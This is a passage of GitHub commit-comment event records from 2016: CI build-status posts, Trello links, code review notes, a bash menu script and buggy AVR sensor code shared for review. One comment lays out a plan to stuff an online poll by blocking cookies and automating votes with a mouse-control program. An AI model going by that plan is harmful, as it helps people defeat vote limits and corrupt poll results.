{"id":"4530502830","type":"CommitCommentEvent","actor":{"login":"bwester"},"repo":{"name":"bwester/p2"},"payload":{"comment":{"id":18936381,"position":null,"line":null,"path":null,"commit_id":"4b1395427b2cea07514d4bf9298a77cfd4e7a715","created_at":"2016-09-07T21:51:15Z","updated_at":"2016-09-07T21:51:15Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;rLG0AJPG&#x2F;549-fix-data-race-in-logging-processcounter\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Fix data race in logging.ProcessCounter</a>"}},"created_at":"2016-09-07T21:51:15Z"}
{"id":"4530508716","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":18936400,"position":null,"line":null,"path":null,"commit_id":"5424c39119718453381c015da6ef5fbbbcfc07d8","created_at":"2016-09-07T21:52:28Z","updated_at":"2016-09-07T21:52:28Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;tGlFK4nw&#x2F;48-enable-doctrinemigrations\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Enable DoctrineMigrations</a>"}},"created_at":"2016-09-07T21:52:28Z"}
{"id":"4530508997","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18936402,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T21:52:32Z","updated_at":"2016-09-07T21:52:32Z","body":"Ok, set internet explorer to not save cookies so refreshing lets you vote again. Now I am going to use a program to control the mouse cursor and use that to vote (because tab doesn't work, and this is the quickest way to get something voting that I can think of) if you look through the html and such, you might be able to find a better or faster way. "}},"created_at":"2016-09-07T21:52:32Z"}
{"id":"4530509412","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":18936404,"position":null,"line":null,"path":null,"commit_id":"545a73280c7be172833291d2ff20ca71de33ad1f","created_at":"2016-09-07T21:52:37Z","updated_at":"2016-09-07T21:52:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;tGlFK4nw&#x2F;48-enable-doctrinemigrations\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Enable DoctrineMigrations</a>"}},"created_at":"2016-09-07T21:52:37Z"}
{"id":"4530511421","type":"CommitCommentEvent","actor":{"login":"diracdeltas"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18936417,"position":null,"line":null,"path":null,"commit_id":"f63f2e4a1fc59b37f7f87f7f65f7201b9761ace7","created_at":"2016-09-07T21:53:02Z","updated_at":"2016-09-07T21:53:02Z","body":"++"}},"created_at":"2016-09-07T21:53:02Z"}
{"id":"4530514457","type":"CommitCommentEvent","actor":{"login":"01micko"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18936433,"position":1,"line":1,"path":"woof-code/rootfs-packages/jwm_config/usr/local/jwm_config/menu_build_places_drives","commit_id":"c4b567db21c44f4d4c8c98607793ed5595cc70b4","created_at":"2016-09-07T21:53:38Z","updated_at":"2016-09-07T21:53:38Z","body":"@zigbert \r\nI forgot about this for a long time but I have a more efficient ( = 'faster\" ) version of this script. Also, it wont display a cd/dvd  if one isn't inserted and also refuses to display extended partitions (because they shouldn't be displayed).\r\n\r\nPlease give it a spin and give me your thoughts.\r\n\r\n```shell\r\n#!/bin/bash\r\n\r\necho '<JWM>'\r\nwhile read a b c d; do\r\n\tPARTITION=$d\r\n\tDRIVE=${d//[0-9]/}\r\n\tcase $PARTITION in\r\n\tsd[a-z][0-9]*)\r\n\t\t#[ $c -le 1 ] && continue # extd partition\r\n\t\t[ \"$(grep \"$DRIVE\" /root/.usb-drive-log-probepart)\" ] && MEDIA=\"usbdrv\" || MEDIA=\"drive\" \r\n\t\tFILESYSTEM=$(guess_fstype /dev/$PARTITION 2>/dev/null)\r\n\t\t[ \"$FILESYSTEM\" = 'swap' -o \"$FILESYSTEM\" = 'unknown' ] && continue\r\n\t\tINFO=\"`cat /sys/block/$DRIVE/device/model`\"\r\n\t\t;;\r\n\tscd*|sr*)\r\n\t\tif [ -d \"$HOME/.pup_event/drive_${PARTITION}\" ];then\r\n\t\t\tMEDIA=\"optical\"\r\n\t\t\tFILESYSTEM=\"iso9660\"\r\n\t\t\tINFO=\"\"\r\n\t\telse\r\n\t\t\tcontinue\r\n\t\tfi\r\n\t\t;;\r\n\tmmc*)\r\n\t\tMEDIA=\"card\"\r\n\t\tFILESYSTEM=$(guess_fstype /dev/$PARTITION)\r\n\t\tINFO=\"MMC/SD: `cat /sys/block/$DRIVE/device/name`\"\r\n\t\t;;\r\n\t*)\r\n\t\tcontinue\r\n\t\t;;\r\n\tesac\r\n\techo \"<Program label=\\\"${PARTITION}   ${FILESYSTEM}   ${INFO}\\\" icon=\\\"/usr/local/lib/X11/pixmaps/${MEDIA}48.png\\\">$HOME/.pup_event/drive_${PARTITION}/AppRun</Program>\"\r\ndone < /proc/partitions\r\necho '</JWM>'\r\n```\r\n\r\n:smile_cat: "}},"created_at":"2016-09-07T21:53:38Z"}
{"id":"4530515722","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18936438,"position":14,"line":178,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-07T21:53:54Z","updated_at":"2016-09-07T21:53:54Z","body":"Can all this be loaded dynamically using 1 line of script inserted into the page where the slideshow should appear?"}},"created_at":"2016-09-07T21:53:54Z"}
{"id":"4530515964","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18936439,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T21:53:56Z","updated_at":"2016-09-07T21:53:56Z","body":"I sent a mail to the address in your Github profile 🐝 "}},"created_at":"2016-09-07T21:53:56Z"}
{"id":"4530517046","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18936441,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-07T21:54:12Z","updated_at":"2016-09-07T21:54:12Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1761 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-07T21:54:12Z"}
{"id":"4530519373","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18936451,"position":17,"line":181,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-07T21:54:40Z","updated_at":"2016-09-07T21:54:40Z","body":"You need to explain where to get the index file. It should be a param in that one line loader, if possible."}},"created_at":"2016-09-07T21:54:40Z"}
{"id":"4530524052","type":"CommitCommentEvent","actor":{"login":"abalter"},"repo":{"name":"hangoutsbot/hangoutsbot"},"payload":{"comment":{"id":18936457,"position":null,"line":null,"path":null,"commit_id":"da35e7993677f86c3faf915451f3e87c0dbff93d","created_at":"2016-09-07T21:55:39Z","updated_at":"2016-09-07T21:55:39Z","body":"I tried &Phi; in slack and it didn't work."}},"created_at":"2016-09-07T21:55:39Z"}
{"id":"4530524143","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18936458,"position":39,"line":520,"path":"payment/src/main/java/org/killbill/billing/payment/core/PaymentProcessor.java","commit_id":"43550c3ff7454265054c68c202e5b5fcd79c5d75","created_at":"2016-09-07T21:55:40Z","updated_at":"2016-09-07T21:55:40Z","body":"Hum... confused: \r\n1. We query all transactions for a given `transactionExternalKey` and a specific tenant `callContext`\r\n2. So then why would we find any transactions from that set that does not match our `internalCallContext.getAccountRecordId()` ? I would understand the check if we were to not use the `<AND_CHECK_TENANT()>` in the original query though"}},"created_at":"2016-09-07T21:55:40Z"}
{"id":"4530524326","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18936459,"position":41,"line":205,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-07T21:55:42Z","updated_at":"2016-09-07T21:55:42Z","body":"You need to explain where to get the index file. It should be a param in that one line loader, if possible."}},"created_at":"2016-09-07T21:55:42Z"}
{"id":"4530527186","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"kbknapp/clap-rs"},"payload":{"comment":{"id":18936465,"position":8,"line":372,"path":"src/app/help.rs","commit_id":"c76785239fd42adc8ca04f9202b6fec615aa9f14","created_at":"2016-09-07T21:56:19Z","updated_at":"2016-09-07T21:56:19Z","body":"#652"}},"created_at":"2016-09-07T21:56:19Z"}
{"id":"4530528945","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18936474,"position":61,"line":225,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-07T21:56:39Z","updated_at":"2016-09-07T21:56:39Z","body":"I recon it should be fade or just a hard swap. The slideshow is killing my browser."}},"created_at":"2016-09-07T21:56:39Z"}
{"id":"4530531803","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18936485,"position":74,"line":238,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-07T21:57:15Z","updated_at":"2016-09-07T21:57:15Z","body":"Add a one line explanation that it can be * or a particular domain if they want to restrict access."}},"created_at":"2016-09-07T21:57:15Z"}
{"id":"4530535220","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18936497,"position":39,"line":520,"path":"payment/src/main/java/org/killbill/billing/payment/core/PaymentProcessor.java","commit_id":"43550c3ff7454265054c68c202e5b5fcd79c5d75","created_at":"2016-09-07T21:57:56Z","updated_at":"2016-09-07T21:57:56Z","body":"Other account in the same tenant use-case (we only look at the tenant record_id in the context, not the account record_id)?"}},"created_at":"2016-09-07T21:57:56Z"}
{"id":"4530535450","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":18936499,"position":19,"line":19,"path":"app/templates/client/clients.jade","commit_id":"fe15c442403cc3f78a130864fc047c3c6305607c","created_at":"2016-09-07T21:57:59Z","updated_at":"2016-09-07T21:57:59Z","body":"Si... lo mismo sugerí "}},"created_at":"2016-09-07T21:57:59Z"}
{"id":"4530540761","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18936523,"position":null,"line":null,"path":null,"commit_id":"5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f","created_at":"2016-09-07T21:59:03Z","updated_at":"2016-09-07T21:59:03Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-07T21:59:03Z"}
{"id":"4530541515","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18936528,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T21:59:11Z","updated_at":"2016-09-07T21:59:11Z","body":"Okay, let me find out what was causing this to fail. Hang on.."}},"created_at":"2016-09-07T21:59:11Z"}
{"id":"4530543173","type":"CommitCommentEvent","actor":{"login":"luismorenovinus"},"repo":{"name":"desarrollovinus/predios"},"payload":{"comment":{"id":18936540,"position":null,"line":null,"path":null,"commit_id":"bad4f1c50b7ae97219a2e87620c35f37b7877039","created_at":"2016-09-07T21:59:29Z","updated_at":"2016-09-07T21:59:29Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;E4LyRlKx&#x2F;29-error-al-generar-la-unidad-funcional-5-en-producccion\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Error al generar la unidad funcional 5 en producccion</a>"}},"created_at":"2016-09-07T21:59:29Z"}
{"id":"4530543450","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18936542,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T21:59:32Z","updated_at":"2016-09-07T21:59:32Z","body":"Okay, let me find out what was causing this to fail. Hang on.."}},"created_at":"2016-09-07T21:59:32Z"}
{"id":"4530543914","type":"CommitCommentEvent","actor":{"login":"luismorenovinus"},"repo":{"name":"desarrollovinus/predios"},"payload":{"comment":{"id":18936544,"position":null,"line":null,"path":null,"commit_id":"0cf81390a7be07ddd4857a196580cf7d03393818","created_at":"2016-09-07T21:59:37Z","updated_at":"2016-09-07T21:59:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;TWoGUYV8&#x2F;28-modificacion-modificacion-kml\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> (Modificación) Modificación KML</a>"}},"created_at":"2016-09-07T21:59:37Z"}
{"id":"4530545531","type":"CommitCommentEvent","actor":{"login":"sensescape"},"repo":{"name":"tangrams/tron"},"payload":{"comment":{"id":18936554,"position":14,"line":120,"path":"layers/buildings.yaml","commit_id":"1726d4ef7cd6a5638c8204d7064bfa194781c16a","created_at":"2016-09-07T21:59:57Z","updated_at":"2016-09-07T21:59:57Z","body":"trying to darken buildings for text legibility"}},"created_at":"2016-09-07T21:59:57Z"}
{"id":"4530555405","type":"CommitCommentEvent","actor":{"login":"skyarkitekten"},"repo":{"name":"neudesic-digi-plat/neumint-docker"},"payload":{"comment":{"id":18936608,"position":null,"line":null,"path":null,"commit_id":"5f550581f31577140c966b22b4c6694c7873b5cb","created_at":"2016-09-07T22:01:50Z","updated_at":"2016-09-07T22:01:50Z","body":"Hey Mahesh!\r\n\r\nGood work. \r\n\r\nQuestion for you- as the system grows, would you keep this general code layout? \r\n\r\nI have seen a couple different ways to organize code for web components and I am interested in what you find the easiest."}},"created_at":"2016-09-07T22:01:50Z"}
{"id":"4530566187","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18936645,"position":null,"line":null,"path":null,"commit_id":"a29f09e94d24fe12d00debfcb6e7830970536114","created_at":"2016-09-07T22:04:07Z","updated_at":"2016-09-07T22:04:07Z","body":"Congrats!"}},"created_at":"2016-09-07T22:04:07Z"}
{"id":"4530567127","type":"CommitCommentEvent","actor":{"login":"andres-erbsen"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":18936650,"position":46,"line":76,"path":"src/Reflection/Reify.v","commit_id":"bb796b735c7804ebde4e843dfe980d8c9775d7ae","created_at":"2016-09-07T22:04:17Z","updated_at":"2016-09-07T22:04:17Z","body":"Is there documentation about how tactic names are scoped?"}},"created_at":"2016-09-07T22:04:17Z"}
{"id":"4530567943","type":"CommitCommentEvent","actor":{"login":"laureneliz"},"repo":{"name":"laureneliz/FarMar"},"payload":{"comment":{"id":18936653,"position":null,"line":null,"path":null,"commit_id":"f26f2562a8a5573a2a2c9aff1c3c57c5d71b828d","created_at":"2016-09-07T22:04:27Z","updated_at":"2016-09-07T22:04:27Z","body":"This is actually the Product class, but whenever I try to `git --amend` on the command line I get trapped in the text editor and can't escape. "}},"created_at":"2016-09-07T22:04:27Z"}
{"id":"4530570785","type":"CommitCommentEvent","actor":{"login":"Neto-Neto"},"repo":{"name":"zabelez/papaleguas"},"payload":{"comment":{"id":18936667,"position":1,"line":1,"path":"Módulo Sensor Ultrassônico","commit_id":"c3f4e0f2581de61c4df9c5c76238ffab85f18eb0","created_at":"2016-09-07T22:05:03Z","updated_at":"2016-09-07T22:05:03Z","body":"// Teste do Ultrasonico \r\n//------------------------------------------------------\r\n#include <avr/io.h>\r\n#include <util/delay.h>\r\n#include <avr/pgmspace.h> // para gravação de dados em memoria flash\r\n#include <avr/interrupt.h> // para interrupção\r\n\r\n#define F_CPU 16000000UL // define frequencia do microcontrolador em 16MHz\r\n\r\n// macros para trabalho com bit\r\n#define set_bit (Y,bit_x) (Y|=(1<<bit_x))\r\n#define clr_bit (Y,bit_x) (Y&=~(1<<bit_x))\r\n#define tst_bit (Y,bit_x) (Y&(1<<bit_x))\r\n#define cpl_bit (Y,bit_x) (Y^=(1<<bit_x))\r\n\r\n#define DISPARO PB1  //definição de \"variavel\" DISPARO = Porta B 1\r\n#define LED1 PD1\r\n#define LED2 PD2\r\n#define LED3 PD3\r\n\r\nunsigned int Inicio_Sinal, Distancia;\r\n//----------------------------------------------------------------------------------------\r\nISR(Timer1_CAPT_vect)\r\n{\r\n    cpl_bit(TCCR1B,ICES1);\r\n\r\n    if (!tst_bit(TCCR1B,ICES1)) //Lê o valor de contagem do TC1 na borda de subida de sinal\r\n        Inicio_Sinal = ICR1; //salva a primeira contaem para determinar a largura do pulso\r\n    else\r\n        Distancia = (ICR1 - Inicio_Sinal)/58; //ICR1 é a descida de sinal (sinal recebido) - incio do sinal(sinal enviado) / 58 => distancia\r\n}\r\n//----------------------------------------------------------------------------------------\r\n\r\nint main()\r\n{\r\n    DDRD = 0b00001110; //portas D: 1,2 e 3 enviam sinal\r\n    PORTD = 0b11110001;\r\n    DDRB = 0b00000010;\r\n    PORTB = 0b11111101;\r\n\r\n    TCCR1B = (1<<ICES1)|(1<<CS11);\r\n    TIMSK = 1<<ICIE1;\r\n    sei();\r\n\r\n   while(1)\r\n   {\r\n      set_bit(PORTB,DISPARO);//pulso de disparo\r\n      _delay_us(10);//largura do pulso digital para iniciar o sensor vide pag. 239\r\n      clr_bit(PORTB,DISPARO);//desativa o pulso digital\r\n\r\n      if(Distancia<431) // se o pulso recebido for menor que 25ms\r\n      {  \r\n      \r\n            if(DISTANCIA <100) //se distancia do pulso for menor que 1m\r\n              clr_bit(PORTD,LED2); // limpa o bit da variavel LED2\r\n              clr_bit(PORTD,LED3); // limpa o bit da variavel LED3\r\n              set_bit(PORTD,LED1); // incrementa o bit da variavel LED1\r\n              \r\n            if(DISTANCIA >100 && <200) //se distancia estiver entre 1 e 2m\r\n              clr_bit(PORTD,LED1); // limpa o bit da variavel LED1\r\n              clr_bit(PORTD,LED3); // limpa o bit da variavel LED3\r\n              set_bit(PORTD,LED2); // incrementa o bit da variavel LED2\r\n      }\r\n      else\r\n        clr_bit(PORTD,LED1); // limpa o bit da variavel LED1\r\n        clr_bit(PORTD,LED2); // limpa o bit da variavel LED2\r\n        set_bit(PORTD,LED3); // incrementa o bit da variavel LED3\r\n        \r\n      _delay_ms(50); // tempo minimo para uma nova medida de distancia\r\n   }\r\n}"}},"created_at":"2016-09-07T22:05:03Z"}
{"id":"4530570854","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18936668,"position":null,"line":null,"path":null,"commit_id":"5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f","created_at":"2016-09-07T22:05:04Z","updated_at":"2016-09-07T22:05:04Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-5b3d9ac2123ae93208a76cbfcfa64b5bc01f6e3f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-07T22:05:04Z"}
{"id":"4530571626","type":"CommitCommentEvent","actor":{"login":"incontrol3000"},"repo":{"name":"incontrol3000/hello-world"},"payload":{"comment":{"id":18936671,"position":1,"line":1,"path":"README.md","commit_id":"522c2b4b6211d3042c3285a779171e173e00d0d3","created_at":"2016-09-07T22:05:15Z","updated_at":"2016-09-07T22:05:15Z","body":"estoy comenzando para aprender"}},"created_at":"2016-09-07T22:05:15Z"}
{"id":"4530571803","type":"CommitCommentEvent","actor":{"login":"laosb"},"repo":{"name":"vijos/vj4"},"payload":{"comment":{"id":18936672,"position":null,"line":null,"path":null,"commit_id":"402a77d2a316bdab1437dd2f69f990827c5586d6","created_at":"2016-09-07T22:05:16Z","updated_at":"2016-09-07T22:05:16Z","body":"Gravatar proxy. Or is there any stable public proxies?"}},"created_at":"2016-09-07T22:05:16Z"}
{"id":"4530572997","type":"CommitCommentEvent","actor":{"login":"chaosagent"},"repo":{"name":"EasyCTF/ctf-calendar"},"payload":{"comment":{"id":18936676,"position":4,"line":29,"path":"config.py","commit_id":"10c81c9311e1da10bd6cc62d5f3ad5914e4c00e7","created_at":"2016-09-07T22:05:31Z","updated_at":"2016-09-07T22:05:31Z","body":"Testing is specifically for unit tests, so debugging is not very needed here"}},"created_at":"2016-09-07T22:05:31Z"}
{"id":"4530578042","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18936695,"position":39,"line":520,"path":"payment/src/main/java/org/killbill/billing/payment/core/PaymentProcessor.java","commit_id":"43550c3ff7454265054c68c202e5b5fcd79c5d75","created_at":"2016-09-07T22:06:35Z","updated_at":"2016-09-07T22:06:35Z","body":"Oh boy, i am tired. Yes makes sense ( i though you were checking `tenant_record_id` (not `account_record_id). Sorry to make you waste your time ;-)\r\n"}},"created_at":"2016-09-07T22:06:35Z"}
{"id":"4530578212","type":"CommitCommentEvent","actor":{"login":"chaosagent"},"repo":{"name":"EasyCTF/ctf-calendar"},"payload":{"comment":{"id":18936696,"position":5,"line":12,"path":"cal.py","commit_id":"10c81c9311e1da10bd6cc62d5f3ad5914e4c00e7","created_at":"2016-09-07T22:06:38Z","updated_at":"2016-09-07T22:06:38Z","body":"Don't use testing or enable DEBUG for staging; staging should be as close to prod as possible. DEBUG and testing also turn off csrf protection and allow access to stack traces."}},"created_at":"2016-09-07T22:06:38Z"}
{"id":"4530578719","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18936700,"position":null,"line":null,"path":null,"commit_id":"43550c3ff7454265054c68c202e5b5fcd79c5d75","created_at":"2016-09-07T22:06:45Z","updated_at":"2016-09-07T22:06:45Z","body":"👍 "}},"created_at":"2016-09-07T22:06:45Z"}
{"id":"4530579214","type":"CommitCommentEvent","actor":{"login":"vadymmarkov"},"repo":{"name":"hyperoslo/Imaginary"},"payload":{"comment":{"id":18936701,"position":null,"line":null,"path":null,"commit_id":"e111dcfcd5a67e6d52febc48c5ebfb9090f77af5","created_at":"2016-09-07T22:06:52Z","updated_at":"2016-09-07T22:06:52Z","body":"@RamonGilabert @zenangst @onmyway133 Having a bad day, merged directly to master. But basically it's based on Mac decompression that we already have. Tested it in the app and seems like it works as it should. Should be a better alternative to 😄 https://github.com/hyperoslo/Imaginary/pull/29"}},"created_at":"2016-09-07T22:06:52Z"}
{"id":"4530581801","type":"CommitCommentEvent","actor":{"login":"chaosagent"},"repo":{"name":"EasyCTF/ctf-calendar"},"payload":{"comment":{"id":18936712,"position":2,"line":27,"path":"config.py","commit_id":"10c81c9311e1da10bd6cc62d5f3ad5914e4c00e7","created_at":"2016-09-07T22:07:26Z","updated_at":"2016-09-07T22:07:26Z","body":"if testing is None and something in is.environ testing = true"}},"created_at":"2016-09-07T22:07:26Z"}
{"id":"4530583052","type":"CommitCommentEvent","actor":{"login":"CarolinaCF"},"repo":{"name":"ValentinaAV/SoftSolidario"},"payload":{"comment":{"id":18936718,"position":null,"line":null,"path":null,"commit_id":"ee47946dd7bbe83bc15a4fc0d91dc77fd3a958ed","created_at":"2016-09-07T22:07:43Z","updated_at":"2016-09-07T22:07:43Z","body":"Describe elementos importantes del alcance y reglas del negocio "}},"created_at":"2016-09-07T22:07:43Z"}
{"id":"4530588520","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18936746,"position":null,"line":null,"path":null,"commit_id":"277a096add6b74ff533425f005f183dc6b2839a8","created_at":"2016-09-07T22:08:54Z","updated_at":"2016-09-07T22:08:54Z","body":"@snicolet I will do that, thanks for your suggestion!"}},"created_at":"2016-09-07T22:08:54Z"}
{"id":"4530589539","type":"CommitCommentEvent","actor":{"login":"jfreax"},"repo":{"name":"federicoiosue/Omni-Notes"},"payload":{"comment":{"id":18936751,"position":null,"line":null,"path":null,"commit_id":"33ac6805b0517caf5022aecae9daba9760c6381f","created_at":"2016-09-07T22:09:08Z","updated_at":"2016-09-07T22:09:08Z","body":"The missing break was actual a feature not a bug ;)\r\nIt was an intentional fallthrough statement. Contracted mode == default.\r\n\r\nIt will not compile now because layoutSelected can be uninitialized. Either remove the break again or (better) initialize layoutSelected with the default value (R.layout.note_layout) a few lines above."}},"created_at":"2016-09-07T22:09:08Z"}
{"id":"4530591990","type":"CommitCommentEvent","actor":{"login":"betelguiese"},"repo":{"name":"betelguiese/DS710GitTstPlanet"},"payload":{"comment":{"id":18936756,"position":1,"line":1,"path":"TstPluto.txt","commit_id":"339eb711ead56f0f37653f80151857a0a8923a29","created_at":"2016-09-07T22:09:39Z","updated_at":"2016-09-07T22:09:39Z","body":"test"}},"created_at":"2016-09-07T22:09:39Z"}
{"id":"4530593895","type":"CommitCommentEvent","actor":{"login":"andreymal"},"repo":{"name":"Orhideous/tabun"},"payload":{"comment":{"id":18936760,"position":5,"line":12,"path":"templates/skin/synio/actions/ActionBlog/add.tpl","commit_id":"ee0500cb36cca1f7c2e2a8b5743ee12430d1bd03","created_at":"2016-09-07T22:10:04Z","updated_at":"2016-09-07T22:10:04Z","body":"DOMContentLoaded, блджад!"}},"created_at":"2016-09-07T22:10:04Z"}
{"id":"4530594075","type":"CommitCommentEvent","actor":{"login":"andreymal"},"repo":{"name":"Orhideous/tabun"},"payload":{"comment":{"id":18936761,"position":4,"line":3,"path":"templates/skin/synio/menu.create.content.tpl","commit_id":"ee0500cb36cca1f7c2e2a8b5743ee12430d1bd03","created_at":"2016-09-07T22:10:07Z","updated_at":"2016-09-07T22:10:07Z","body":"DOMContentLoaded, блджад!"}},"created_at":"2016-09-07T22:10:07Z"}
{"id":"4530594855","type":"CommitCommentEvent","actor":{"login":"RobDolinMS"},"repo":{"name":"opencontainers/runtime-spec"},"payload":{"comment":{"id":18936763,"position":null,"line":null,"path":null,"commit_id":"d4076604a0d1050628b5b283337d1c7e37c756cc","created_at":"2016-09-07T22:10:16Z","updated_at":"2016-09-07T22:10:16Z","body":"Signed-off-by: Rob Dolin <robdolin@microsoft.com>"}},"created_at":"2016-09-07T22:10:16Z"}
{"id":"4530596186","type":"CommitCommentEvent","actor":{"login":"bagnalla"},"repo":{"name":"bagnalla/cagesim"},"payload":{"comment":{"id":18936764,"position":null,"line":null,"path":null,"commit_id":"601d3b791753cc0e59b2cb24e586e08a47105691","created_at":"2016-09-07T22:10:33Z","updated_at":"2016-09-07T22:10:33Z","body":"Yes, kind of. The original intent was to implement a fast MWU game dynamics simulation that is more conducive to collecting and analyzing data (probability distributions, regret, etc).\r\nWe can set epsilon to bound the expected regret, but it doesn't seem clear what a bound on the expected regret really means wrt. the behavior of the system. It seems that a reasonable requirement for a practical application of the system may be something like \"it's okay for the outcomes to be random, but not too random\", i.e. some limit on the level of nondeterminism. How does that translate to a bound on the expected regret for players?\r\nFor instance, it may be possible for the normalized costs of a game to be in the 